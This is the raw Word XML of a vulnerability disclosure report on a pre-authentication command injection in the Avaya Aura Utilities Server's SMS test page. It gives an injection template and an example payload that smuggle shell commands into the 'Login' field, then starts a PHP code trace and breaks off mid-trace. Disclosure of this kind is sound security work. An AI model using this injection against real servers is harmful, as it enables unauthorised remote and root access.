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D7A7" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="008E2160" w:rsidP="008E2160">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Avaya Aura</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> Utilities Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B63C2" w14:textId="3DAF3635" w:rsidR="00272B68" w:rsidRDefault="001E48A2" w:rsidP="008E2160">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabil</w:t>
      </w:r>
      <w:r w:rsidR="00057C09">
        <w:t>ity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12FE65" w14:textId="39B67449" w:rsidR="008E2160" w:rsidRDefault="008E2160" w:rsidP="008E2160"/>
    <w:p w14:paraId="794B4D62" w14:textId="5D1FFA0A" w:rsidR="008E2160" w:rsidRDefault="008E2160" w:rsidP="008E2160">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC82ACD" w14:textId="6F4E334C" w:rsidR="008E2160" w:rsidRDefault="008E2160" w:rsidP="008E2160">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered multiple Avaya Aura </w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve">Utilities Server </w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which can be combined to allow an unauthenticated, remote attacker to achieve full root access to Avaya Aura servers. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was only able to test this exploit chain across two versions of Avaya Aura</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> Utilities Server</w:t>
      </w:r>
      <w:r>
        <w:t>, one in a client environment</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0014600F">
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> version</w:t>
      </w:r>
      <w:r w:rsidR="0014600F">
        <w:t xml:space="preserve"> of US-7.1.0.0.0.18-e55-01</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve">, and in an older version in a lab (7.0.0.0.0.12-e55-01). However, most of the </w:t>
      </w:r>
      <w:r w:rsidR="654B54AA">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t>existed across both environments with some minor differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3823DCB7" w14:textId="01AD7F7A" w:rsidR="00F94D6F" w:rsidRDefault="00643812" w:rsidP="008E2160">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F94D6F">
        <w:t xml:space="preserve"> would be happy to validate these issues against the latest version of Avaya Aura Utilities Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as well as test any remediation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>efforts,</w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t xml:space="preserve"> if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F94D6F">
        <w:t xml:space="preserve"> Avaya would be willing to supply a copy for testing purposes. We have made every effort to describe the issues in as much detail as possible, as it is likely that in some versions </w:t>
      </w:r>
      <w:r w:rsidR="0015597B">
        <w:t xml:space="preserve">of Utilities Server </w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t>the underlying issues still exists, but the exploitation may differ slightly due to other code</w:t>
      </w:r>
      <w:r w:rsidR="7A48F0C4">
        <w:t xml:space="preserve"> or configuration</w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t xml:space="preserve"> changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B6F10D" w14:textId="06A8D565" w:rsidR="00BE4E31" w:rsidRDefault="00BE4E31" w:rsidP="00BE4E31">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Researchers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F3453" w14:textId="3F7F958C" w:rsidR="00BE4E31" w:rsidRPr="00BE4E31" w:rsidRDefault="00BE4E31" w:rsidP="00BE4E31">
      <w:r>
        <w:t xml:space="preserve">All issues discussed in this report were discovered and exploited by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Employees: Gerardo Iglesias and Shelby Spencer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2797D748" w14:textId="0145BA7B" w:rsidR="008E2160" w:rsidRDefault="00F94D6F" w:rsidP="00F94D6F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Ref58918130"/>
      <w:r w:rsidRPr="00F94D6F">
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E2160">
        <w:t>Pre-Authentication Remote Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="20EB0979" w14:textId="1B862DAC" w:rsidR="00F94D6F" w:rsidRDefault="00F94D6F" w:rsidP="00F94D6F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883EE3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1</w:t>
      </w:r>
      <w:r w:rsidR="00883EE3" w:rsidRPr="00883EE3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00883EE3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94D6F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94D6F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r w:rsidR="00883EE3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E65AF7" w14:textId="51F436E6" w:rsidR="00F94D6F" w:rsidRPr="00F94D6F" w:rsidRDefault="00F94D6F" w:rsidP="00F94D6F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94D6F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2041E" w14:textId="3F0F4438" w:rsidR="00F94D6F" w:rsidRDefault="008E2160" w:rsidP="4E2F76D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered a Pre-Authentication Remote Code </w:t>
      </w:r>
      <w:r w:rsidR="732A767D">
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> in the Avaya Aura Utilities Server.</w:t>
      </w:r>
      <w:r w:rsidR="22F71E4F">
        <w:t xml:space="preserve"> The vulnerability is present in the “System Management Service” web service, specifically in the “SMS Test” functionality</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> This vulnerability allow</w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> an un-authenticated attacker to gain command execution as the relatively low-privileged “apache” user.</w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t xml:space="preserve"> Combined with other issues </w:t>
      </w:r>
      <w:r w:rsidR="25866109">
        <w:t xml:space="preserve">detailed </w:t>
      </w:r>
      <w:r w:rsidR="00F94D6F">
        <w:t>in this report, this vulnerability can be chained to achieve root code execution on Avaya Aura Utilities Servers.</w:t>
      </w:r>
      <w:r w:rsidR="00801F5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F3DF9">
        <w:t>For a full example of leveraging this vulnerability, please see: “</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58936618 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>Appendix 2: Full Pre-Auth RCE to Root Proof-of-Concept</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000F3DF9">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C3B1A" w14:textId="49B90734" w:rsidR="00F94D6F" w:rsidRPr="00F94D6F" w:rsidRDefault="00F94D6F" w:rsidP="008E2160">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B4DB8" w14:textId="0EA54F41" w:rsidR="008E2160" w:rsidRDefault="00801F5F" w:rsidP="008E2160">
      <w:r>
        <w:t>The command execution vulnerability exists in the “Login” POST parameter to the “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms_test.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” page.</w:t>
      </w:r>
      <w:r w:rsidR="00BE2485">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:t xml:space="preserve">This page is accessible via direct browsing, without any authentication. </w:t>
      </w:r>
      <w:r w:rsidR="009B4314">
        <w:t>Below are a couple screenshots showing the attack:</w:t>
      </w:r>
      <w:r w:rsidR="009B4314">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009B4314">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003F7CB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE98EB6" wp14:editId="4B83DB89">
            <wp:extent cx="5943600" cy="425386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3865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F1A47" w14:textId="77777777" w:rsidR="009B4314" w:rsidRPr="008E2160" w:rsidRDefault="009B4314" w:rsidP="008E2160"/>
    <w:p w14:paraId="5AD064AE" w14:textId="1ACCA4D4" w:rsidR="008E2160" w:rsidRDefault="00BE2485" w:rsidP="008E2160">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB23CA1" wp14:editId="753EE70E">
            <wp:extent cx="5943600" cy="25368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6825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A863C4E" w14:textId="040705D6" w:rsidR="003F7CB3" w:rsidRDefault="009B4314" w:rsidP="008E2160">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> relevant parameter is the “Login” parameter however, the “Model” and “Op” parameters must point to a valid Model and </w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:t>the O</w:t>
      </w:r>
      <w:r>
        <w:t>peration</w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F7CB3">
        <w:t>for that Model</w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003F7CB3">
        <w:t xml:space="preserve">This information can be found under the “Model Documentation” link on the left side of the page. </w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:t xml:space="preserve">A “Password” should be supplied however the </w:t>
      </w:r>
      <w:r w:rsidR="00F87747">
        <w:lastRenderedPageBreak/>
        <w:t>actual value is unimportant. For successful remote code execution, other POST parameters are required, however they are the defaults presented within the web application.</w:t>
      </w:r>
      <w:r w:rsidR="003F7CB3">
        <w:t xml:space="preserve"> The command injection should take the form:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F7CB3" w14:paraId="3E4C7468" w14:textId="77777777" w:rsidTr="003F7CB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="41784719" w14:textId="25FEC4F6" w:rsidR="003F7CB3" w:rsidRPr="003F7CB3" w:rsidRDefault="003F7CB3" w:rsidP="003F7CB3">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;username&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>@</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;ip&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;port&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;malicious command here&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>|</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E2614F4" w14:textId="673D65DD" w:rsidR="003F7CB3" w:rsidRDefault="00F87747" w:rsidP="008E2160">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003F7CB3">
        <w:t>For example (as shown in previous screenshots):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F7CB3" w14:paraId="26C53276" w14:textId="77777777" w:rsidTr="00CE2F0D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="77417F7F" w14:textId="4774CE29" w:rsidR="003F7CB3" w:rsidRPr="003F7CB3" w:rsidRDefault="003F7CB3" w:rsidP="003F7CB3">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>avaya@127.0.0.1:22&amp;echo SUCCESS&gt;/var/www/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>avayadir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>avayadirini</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F7CB3">
              <w:t>/update.txt|</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="795140A0" w14:textId="079A96FC" w:rsidR="009B4314" w:rsidRDefault="009B4314" w:rsidP="008E2160">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Though the actual command injection exploit is </w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t>relatively straight-forward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the path by which code execution occurs is anything but. Below is a quick overview of that path.  Since this vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="2570A17A">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ffects multiple versions of Avaya Aura (at least two that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to test), exact line numbers are not provided as they may change between versions</w:t>
      </w:r>
      <w:r w:rsidR="00247DA0">
        <w:t xml:space="preserve">, however a full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00247DA0">
        <w:t>backtrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00247DA0">
        <w:t xml:space="preserve"> of the execution path</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>FusionX’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> lab environment</w:t>
      </w:r>
      <w:r w:rsidR="00247DA0">
        <w:t xml:space="preserve"> is provided in </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58911292 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve">Appendix 1: Full Pre-Auth RCE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00011234">
        <w:t>BackTrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00936113">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1) /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms_test.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>instantiates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMSTestController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” class</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> (/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t>/include/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>SAWController.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t>) and then ultimately calls the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>ProcessRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t>” method</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>on that class</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4314" w14:paraId="4E11D0C9" w14:textId="77777777" w:rsidTr="00FB064C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5647012B" w14:textId="1EC9226C" w:rsidR="009B4314" w:rsidRPr="00FB064C" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t>switch ($_GET['mode'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D04BEDC" w14:textId="47C491F1" w:rsidR="009B4314" w:rsidRPr="00FB064C" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CB4642" w14:textId="3F2DC652" w:rsidR="009B4314" w:rsidRPr="00FB064C" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F53077B" w14:textId="77777777" w:rsidR="009B4314" w:rsidRPr="00FB064C" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t xml:space="preserve">    default:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F52A151" w14:textId="77777777" w:rsidR="009B4314" w:rsidRPr="00FB064C" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>require_once</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> "include/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>SMSTestController.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2003A401" w14:textId="77777777" w:rsidR="009B4314" w:rsidRPr="00FB064C" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> $ctrl = &amp;new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>SMSTestController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53EDBDEF" w14:textId="3C1B4C8A" w:rsidR="009B4314" w:rsidRDefault="009B4314" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:t>break;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7C46721E" w14:textId="77777777" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3594E55B" w14:textId="77777777" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="003804C5">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>( $ctrl ) )</w:t>
            </w:r>
